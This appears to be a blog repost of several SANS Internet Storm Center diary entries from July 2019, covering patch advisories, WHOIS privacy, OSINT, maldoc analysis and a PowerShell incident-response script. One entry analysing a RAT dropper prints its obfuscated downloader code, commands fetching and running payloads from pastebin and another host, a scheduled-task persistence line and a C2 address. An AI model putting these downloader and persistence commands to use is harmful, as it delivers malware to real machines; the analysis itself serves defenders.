Posted on Leave a comment

VMWare Security Advisory on DoS Vulnerability in ESXi, (Tue, Jul 9th)

VMWare has released patches for ESXi that address a denial of service vulnerablility in hostd. ESXi 6.0 is unaffected, 6.5 has a patch, and 6.7 has a patch pending. This addresses a vulnerability described in CVE-2019-5528 and is rated important (CVSSv3 = 5.3). A workaround has also been published. If you run ESXi, you should take a look at this as well today.

 


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

MSFT July 2019 Patch Tuesday, (Tue, Jul 9th)

July 2019 Security Updates

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET Denial of Service Vulnerability
%%cve:2019-1083%% No No Less Likely Less Likely Important    
.NET Framework Remote Code Execution Vulnerability
%%cve:2019-1113%% No No More Likely More Likely Critical    
ADFS Security Feature Bypass Vulnerability
%%cve:2019-0975%% No No Less Likely Less Likely Important 4.3 3.9
%%cve:2019-1126%% No No Less Likely Less Likely Important 5.3 4.8
ASP.NET Core Spoofing Vulnerability
%%cve:2019-1075%% No No Less Likely Less Likely Moderate    
Azure Automation Elevation of Privilege Vulnerability
%%cve:2019-0962%% Yes No Less Likely Less Likely Important    
Azure DevOps Server and Team Foundation Server Remote Code Execution Vulnerability
%%cve:2019-1072%% No No Less Likely Less Likely Critical    
Chakra Scripting Engine Memory Corruption Vulnerability
%%cve:2019-1062%% No No Critical 4.2 3.8
%%cve:2019-1092%% No No Critical 4.2 3.8
%%cve:2019-1103%% No No Critical 4.2 3.8
%%cve:2019-1106%% No No Critical 4.2 3.8
%%cve:2019-1107%% No No Critical 4.2 3.8
DirectWrite Information Disclosure Vulnerability
%%cve:2019-1093%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1097%% No No Less Likely Less Likely Important 5.5 5.0
DirectWrite Remote Code Execution Vulnerability
%%cve:2019-1117%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1118%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1119%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1120%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1121%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1122%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1123%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1124%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1127%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1128%% No No Less Likely Less Likely Important 7.8 7.0
DirectX Elevation of Privilege Vulnerability
%%cve:2019-0999%% No No Important 7.8 7.0
Docker Elevation of Privilege Vulnerability
%%cve:2018-15664%% Yes No Less Likely Less Likely Important    
GDI+ Remote Code Execution Vulnerability
%%cve:2019-1102%% No No Less Likely Less Likely Critical 8.4 7.6
Internet Explorer Memory Corruption Vulnerability
%%cve:2019-1063%% No No More Likely More Likely Critical 6.4 5.8
Latest Servicing Stack Updates
ADV990001 No No Critical    
Microsoft Browser Memory Corruption Vulnerability
%%cve:2019-1104%% No No More Likely More Likely Critical 6.4 5.8
Microsoft Excel Information Disclosure Vulnerability
%%cve:2019-1112%% No No More Likely More Likely Important    
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2019-1110%% No No Less Likely Less Likely Important    
%%cve:2019-1111%% No No Less Likely Less Likely Important    
Microsoft Exchange Information Disclosure Vulnerability
%%cve:2019-1084%% No No Less Likely Less Likely Important    
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2019-1136%% No No Less Likely Less Likely Important    
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2019-1137%% No No Less Likely Less Likely Important    
Microsoft Office SharePoint XSS Vulnerability
%%cve:2019-1134%% No No Less Likely Less Likely Important    
Microsoft Office Spoofing Vulnerability
%%cve:2019-1109%% No No Less Likely Less Likely Important    
Microsoft SQL Server Remote Code Execution Vulnerability
%%cve:2019-1068%% Yes No Less Likely Less Likely Important    
Microsoft Windows Elevation of Privilege Vulnerability
%%cve:2019-1074%% No No More Likely More Likely Important 5.3 5.3
%%cve:2019-1082%% No No Important 7.7 7.7
Microsoft splwow64 Elevation of Privilege Vulnerability
%%cve:2019-0880%% No Yes Detected More Likely Important 7.0 6.3
Microsoft unistore.dll Information Disclosure Vulnerability
%%cve:2019-1091%% No No Less Likely Less Likely Important 5.5 5.0
Outlook on the web Cross-Site Scripting Vulnerability
ADV190021 No No Important    
Remote Desktop Protocol Client Information Disclosure Vulnerability
%%cve:2019-1108%% No No More Likely More Likely Important 6.5 5.9
Remote Desktop Services Remote Code Execution Vulnerability
%%cve:2019-0887%% Yes No More Likely More Likely Important 8.0 7.2
Scripting Engine Memory Corruption Vulnerability
%%cve:2019-1056%% No No Critical 6.4 5.8
%%cve:2019-1059%% No No Less Likely Less Likely Critical 6.4 5.8
%%cve:2019-1001%% No No More Likely More Likely Critical 6.4 5.8
%%cve:2019-1004%% No No More Likely More Likely Critical 6.4 5.8
SymCrypt Denial of Service Vulnerability
%%cve:2019-0865%% Yes No Less Likely Less Likely Important 7.5 6.7
Team Foundation Server Cross-site Scripting Vulnerability
%%cve:2019-1076%% No No Less Likely Less Likely Important    
Visual Studio Elevation of Privilege Vulnerability
%%cve:2019-1077%% No No Less Likely Less Likely Important    
Visual Studio Information Disclosure Vulnerability
%%cve:2019-1079%% No No Less Likely Less Likely Important    
WCF/WIF SAML Token Authentication Bypass Vulnerability
%%cve:2019-1006%% No No Less Likely Less Likely Important    
Win32k Elevation of Privilege Vulnerability
%%cve:2019-1132%% No Yes Important 7.8 7.2
Win32k Information Disclosure Vulnerability
%%cve:2019-1096%% No No Less Likely Less Likely Important 5.5 5.0
Windows Audio Service Elevation of Privilege Vulnerability
%%cve:2019-1086%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1087%% No No Less Likely Less Likely Important 7.8 7.0
%%cve:2019-1088%% No No Less Likely Less Likely Important 7.8 7.0
Windows DHCP Server Remote Code Execution Vulnerability
%%cve:2019-0785%% No No Less Likely Less Likely Critical 9.8 8.8
Windows DNS Server Denial of Service Vulnerability
%%cve:2019-0811%% No No Less Likely Less Likely Important 7.5 6.7
Windows Elevation of Privilege Vulnerability
%%cve:2019-1129%% Yes No More Likely More Likely Important 7.8 7.0
%%cve:2019-1130%% No No Less Likely Less Likely Important 7.8 7.0
Windows Error Reporting Elevation of Privilege Vulnerability
%%cve:2019-1037%% No No Less Likely Less Likely Important 7.0 6.3
Windows GDI Information Disclosure Vulnerability
%%cve:2019-1094%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1095%% No No Less Likely Less Likely Important 5.5 5.0
%%cve:2019-1098%% No No Important 5.5 5.0
%%cve:2019-1099%% No No Important 5.5 5.0
%%cve:2019-1100%% No No Important 5.5 5.0
%%cve:2019-1101%% No No Important 5.5 5.0
%%cve:2019-1116%% No No Important 5.5 5.0
Windows Hyper-V Denial of Service Vulnerability
%%cve:2019-0966%% No No Less Likely Less Likely Important 6.8 6.1
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2019-1067%% No No More Likely More Likely Important 7.8 7.0
Windows Kernel Information Disclosure Vulnerability
%%cve:2019-1071%% No No More Likely More Likely Important 5.5 5.0
%%cve:2019-1073%% No No More Likely More Likely Important 5.5 5.0
Windows RPCSS Elevation of Privilege Vulnerability
%%cve:2019-1089%% No No More Likely More Likely Important 7.8 7.0
Windows WLAN Service Elevation of Privilege Vulnerability
%%cve:2019-1085%% No No Less Likely Less Likely Important 7.8 7.0
Windows dnsrlvr.dll Elevation of Privilege Vulnerability
%%cve:2019-1090%% No No Less Likely Less Likely Important 7.8 7.0

 


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Solving the WHOIS and Privacy Problem: A Draft of Implementing WHOIS in DNS, (Tue, Jul 9th)

Recently, due to GDPR, WHOIS records for domains have been redacted in many places and access to the information that has been relied on by investigators and abuse fighters is either much harder to get or simply unavailable. In theory, ICANN should be setting up a gated system that will give tiered access to various classes of people, but having participated in those discussions, it does not seem such a system would allow for access to the data we need to investigate, correlate, and respond to abuse and cybercrime.

To help solve this problem, fellow handler Richard Porter and myself have created an Internet-Draft to put information formerly available in WHOIS into DNS TXT records so the information can be voluntarily made available by domain owners. This will allow for programmatic access that can be used in automation to make policy decisions quickly (for instance, should I accept email from this domain). The gist of the proposal is to use a _whois subdomain record and have a variety of TXT records for adminstrative, technical, network, and security/abuse contacts (name, phone number, email, address). As the system relies on self-disclosure, it bypasses some of the sticker issues with privacy laws.

Take a look and chime in on your thoughts in comments or on the DNSOP mailing list where this is being discussed.


John Bambenek
bambenek at gmail /dot/ com
ThreatSTOP

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Machine Code? No!, (Mon, Jul 8th)

On the 4th of July, I posted diary entry “Machine Code?” with the following screenshot:

This is dissasembler output from the “Netwide Assembler” for 32-bit code.

What was the content of file binary? This:

4th of July

I wanted to illustrate that a x86 disassembler will always produce output, even if you provide it input that is “not real” machine code.

Some time ago, I had a friend analyze a capture file: suspecting an exploit, he took the data out of a TCP packet and disassembled it. He was not familiar with assembler code or machine language, but since the disassembler produce a listing (without errors), he concluded that the data he found in that packet must be shellcode.

I explained to him that this was not the case: a disassembler will do its best to produce a listing whatever input you give it. It’s up to the analyst to understand the purpose of the disassembled program, and decide it is indeed a program at all.

And that’s not easy, it requires skill, expecially with obfuscated shellcode.

If you don’t have these skills, then there are still other methods you can use to determine if you are dealing with shellcode. One method is dynamic analysis: execute it, and see what happens.

I refer to diary entry “Analyzing Encoded Shellcode with scdbg” if you want to know more.

Conclusion: being able to produce a disassembly listing is not a reliable detection method for shellcode.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

OpSec and OSInt , (Sun, Jul 7th)

Operations security (OpSec) is a military term that has evolved into the InfoSec realm.  In a military context OpSec describes a process that identifies critical information to determine if friendly actions can be learned or observed by enemy intelligence, and if the information obtained by the enemy could be useful to subvert operations.

In the InfoSec realm OPSec is the process of determining what publicly available information is available about an organization and to determine if the information, either individually or in aggregate, could be used by a nefarious individual to do damage to the organization.

A trivial example of where publicly available information could be used by the bad guys is Spear Phishing.  The list of company executives taken off of a company website combined with the format of the corporate email addresses can be used to craft and deliver a spear phishing email.

Open Source intelligence (OSInt) is the process of determining what information is publicly available.

There are many tools available to assist with OSInt, starting with Google, but finding the right tools to sift through the myriad types of information is difficult. An excellent resource for finding those tools is the OSInt Framework.  The OSInt Framework is a huge mindmap of available OSInt tools classified by the type(s) of data they are useful for.  

In the last couple of weeks I stumbled on a creative use for OSInt.  A non-profit organization called Trace Labs is using crowd sourced Open Source Intelligence to gather verified information for missing person cases.  After a few weeks of information gathering the information is turned over to the police. They have also gameified the OSInt process through virtual capture the flag (CTF) events as well as CTF events at B-sides and other conferences. Trace Labs next virtual CTF event is on Saturday July 13th. 
 

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Malicious XSL Files, (Sat, Jul 6th)

In yesterday’s diary entry “A ‘Stream O’ Maldoc”, the payload was an XSL/XSLT file.

Now, malicious XSL files will not execute just by double-clicking them. On a default Windows install, Internet Explorer will be lanched to display the content of the file as XML:

But in this case, the malicious Word document contains VBA code that will launch a WMIC query with the XSL file as stylesheet:

This results in the execution of the code inside the XSL file, as discovered and reported by subTee/Casey Smith last year.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

A "Stream O" Maldoc, (Fri, Jul 5th)

Reader Robert submitted a malicious document. It just happens to be a maldoc with the payload hidden in a user form, as discussed in diary entry “Maldoc: Payloads in User Forms” last weekend.

I’m using plugin plugin_stream_o to view the payload.

This output is more user-friendly: it’s a XLS/XLST file with malicious JScript: a downloader:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Machine Code?, (Thu, Jul 4th)

A bit unusual diary entry on this day.

Do you recognize this disassembler output?

If not, don’t spend time on it, I’ll give more details in tomorrow’s diary entry.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Malicious Script With Multiple Payloads, (Tue, Jul 2nd)

Pastebin.com remains a common way to download malicious data and/or scripts. A few days ago, I spotted this malicious script that got a very low score on VT: 3/57 (SHA56:45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e)[1]. The obfuscation wasn’t very complex but remains quite effective. The script is just a downloader that fetches more content from pastebin.com as well as other sites.

A first payload is downloaded from pastebin.com:

Set As_wW = CreateObject("WScript.Shell")
Dim AXW
AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
AXW2 = "t -command [Reflection.Assembly]::Load("
AXW4 = "-Object Net.WebClient).DownloadStri"
AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
AXW3 = "[System.Convert]::FromBase64String((New"
AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
As_wW.Run AXW, vbHide

The decoded command is:

cmd.exe / c ping 127.0.0.1 -n 10 > nul & 
mshta.exe vbscript:CreateObject("Wscript.Shell").Run(""powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)

Let’s have a look at the pastie:

isc> curl -s hxxps://pastebin[.]com/raw/e8GrYbHb| head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB

You recognise immediately a PE file

isc> curl -s https://pastebin[.]com/raw/e8GrYbHb| base64 -d | sha256sum
8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf -

The file has a score of 17/72 on VT[2]

Then, a second payload is downloaded:

Set shell = CreateObject("WScript.Shell")
shell.Run("Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[AppDomain]::('^urrentDomain'.replace('^','C')).('%oad'.replace('%','L'))($sc64).'EntryPoint'.('[email protected]'.replace('g','e').replace('@','v'))($null,$null)"),0

Let’s have a look at this payload:

isc> curl -s hxxp://www.m9c[.]net/uploads/15615146751.jpg | head -c 100
    0x4D, 0x5A, 0x90, 0*0, 0*3, 0*0, 0*0, 0*0, 0*4, 0*0, 0*0, 0*0,
    0xFF, 0xFF, 0*0, 0*0, 0xB8, 0*0, 0

Again, a PE file (0x04D, 0x5A == “MZ”). It can be easily decoded with a tool like Cyberchef via a bunch of search/replace and converting from hex characters. The file is unknown on VT (SHA256:86e29714187bdfe606ca791e83f48263e590598b9f466ff5bf6a7ce99a4e54d3)

The third payload is again grabbed from pastebin:

isc> curl -s hxxps://pastebin[.]com/raw/2HpiMFUJ

'============Checking the system architecture=========================================
Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "powershell -noexit $Script = Invoke-WebRequest 'hxxps://pastebin[.]com/raw/9NQF7jy5';$ScriptBlock = [Scriptblock]::Create($Script.Content);Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList ($args + @('someargument'));" oShell.Run strArgs, 0, false
self.close

And the next payload is:

isc> curl -s hxxps://pastebin[.]com/raw/9NQF7jy5$
code = @"
using System.Net;
using System.Reflection;
using System;
using System.Threading;
namespace CDTPitbull
{
    public class Cat
    {
        public void Run()
        {
            using (WebClient wc = new WebClient())
            {
               // new Thread(() =>
              //  {
                    try
                    {
                        Assembly asm = AppDomain.CurrentDomain.Load(Convert.FromBase64String(wc.DownloadString("hxxps://pastebin[.]com/raw/3qSWYxTb")));
                        MethodInfo Metinf = asm.EntryPoint;
                        object InjObj = asm.CreateInstance(Metinf.Name);
                        object[] parameters = new object[1];  // C#
                        if (Metinf.GetParameters().Length == 0)
                        {
                            parameters = null; // VB.NET
                        }
                        Metinf.Invoke(InjObj, parameters);
                    }
                    catch { return; }
              //  })
              //  { IsBackground = false }.Start();
            }
        }
    }
}
"@

Add-Type -TypeDefinition $code;
$instance = New-Object CDTPitbull.Cat;
$instance.Run();

And the last one is again a PE file:

isc> curl -s https://pastebin.com/raw/3qSWYxTb | head -c 100
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB
isc> curl -s https://pastebin.com/raw/3qSWYxTb | base64 -d | sha256sum
55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f  -

This payload has a score of 24/70 on VT[3] (SHA256:55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f)

Persistence is achieved by creating a scheduled task:

cmd.exe /c ping 127.0.0.1 -n 30 > nul & schtasks /create /sc MINUTE /mo 200 /tn "MicrosoftWin32" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe hxxps://pastebin[.]com/raw/2HpiMFUJ",0,true)(window.close)" /F

Finally, any running Excel or Word instances are killed:

Set X7W832DSA = CreateObject("WScript.Shell")
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%""  & taskkill /f /im EXCEL.EXE & taskkill /f /im WINWORD.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide

I don’t know the purpose of this…

It’s a RAT trying to connect to the following C2 server: bylgay[.]hopto[.]org (152[.]245[.]159[.]90)

[1] https://www.virustotal.com/gui/file/45e45d2932816b14665f65ee4fc1aa7473b29031da1612d3d909f867c618d80e/detection
[2] https://www.virustotal.com/gui/file/8d54da80492eefcb1b688be56a18d2ea353aaa2d02b09256d5f3c9803104a1bf/detection
[3] https://www.virustotal.com/gui/file/55fd3697bd2bfdc519b5faf4c58055ce69ddf912b87a3bf6e92a541729a5e49f/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted on Leave a comment

Using Powershell in Basic Incident Response – A Domain Wide "Kill-Switch", (Tue, Jul 2nd)

Now that we have the hashes for all the running processes in the AD Domain, and also have the VT Score for each hash in the system, how can we use this information?  Incident Response comes immediately to mind for me.  If you’ve ever been in a medium-to-large-scale “incident”, the situation that you often find is ‘we know everything seems to be infected, but out of thousands of machines, which ones are actually infected right now?  Not only that, but “our AV doesn’t detect this exact malware yet, or if it does, it detects it but doesn’t kill it or delete it”.  The methods we’ve looked at these last few days allow us to enumerate an up to the minute list of infected stations, outputting a “punch list” for the responders fixing those stations.  Not only that, but we can tack on a “kill switch” command that will terminate (and even delete) the running malware if the AV product isn’t doing that.

What we don’t want to do is to automate this too much or too soon – don’t take the VirusTotal listing and do any global kill process code based on just that!  You might for instancesee a hash collision, and kill a good process.  Or, much more likely, we could have one AV vendor in the VT pool (which as of today is 66 vendors) return a false positive for our hash.  And if one vendor returns a false positive, you’ll likely find 5 or 6 more vendors who as a first step in their automation process is “copy that other vendor’s result”.   So one false positive almost always ramps up to 4-5-6-7 in short order, ramping back to zero will often take longer than the ramp-up.

What we want to do is take all of our inputs to ensure that the file hash is a true IoC for the current infection.  At this point, should we use the output of our first script?  The short answer there is “NO”!  The Windows process numbers may have changed, and we likely don’t want to go killing processes by name (unless we are very sure that we don’t have a name collision in our infection).

What we’ll do is take our known malware hash, and sweep the domain looking for a match at this instant.  If we find one on a machine, we’ll kill that process and return the machine name and the various file names affected.  If you deep in IR mode, you might also want to delete those affected files (or at least try to).

Our code should look something like the sample below.  Again, BE CAREFUL – targeting the wrong process can easily bluescreen an entire domain in minutes.  If you add the “delete” line, if you accidentally target something that Windows needs those bluescreened devices won’t be coming back without help (every AV vendor has learned this the hard way):

function EnumAndKill {
    $targethash = @()

    $retlist = @()

    foreach ($proc in Get-Process) {
    try
        {
        # hash the executable file on disk
        $hash = Get-FileHash $proc.path -Algorithm SHA1 -ErrorAction stop
        if($hash -eq $targethash) {
            $retval = @()
            $retval | add-member -membertype noteproperty -name HostName -value $env.ComputerName
            $retval | add-member -membertype noteproperty -name TargetHash -value $hash
            $retval | add-member -membertype noteproperty -name ProcessName -value $proc.name
            $retval | add-member -membertype noteproperty -name FilePath -value $proc.path
            $retval | add-member -membertype noteproperty -name Result -value “”

            Stop-Process -InputObject $proc
            $killconfirmed = Get-Process | Where-Object {$_.HasExited}
            if ($p.processname -match $killconfirmed.processname)

               {
               $retval.Result = “SUCCESS”
               # possibly add a delete of $proc.path here (depending on your situation)
               }
            else { $retval.Result = “ERROR”}
            $retlist += $retval
            }
        }       
     catch {
        # error handling.  If the file can’t be hashed – either it’s not there or we don’t have rights to it
        # note that you will need to edit the host and share for your environment
        # no catch statements in this function
        }
    }
    $retlist
}

$TargetHash = “”
$targets =get-adcomputer -filter * -Property DNSHostName
$count = $targets.count
$i = 1
$DomainKillResult = @()

foreach ($targethost in $targets) {
   write-host $i of $count –  $targethost.DNSHostName
   if (Test-Connection -ComputerName $targethost.DNSHostName -count 2 -Quiet) {
       $DomainKillResult += = invoke-command -ComputerName $targethost.DNSHostName ${function:EnumandKill($TargetHash)}
       ++$i
       }
   }

 

 

We *really* could have used something like this in an incident that I worked about a year ago.  Multiple timezones, limited IT resources, and a variant of trickbot that (at first) no AV  product would detect, and later even when the products would detect the malware, they stubbornly refused to stop or delete the executables involved.

Got any IR war stories to tell?  Please, use our comment form, let’s talk!

===============
Rob VandenBrink
Coherent Security

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.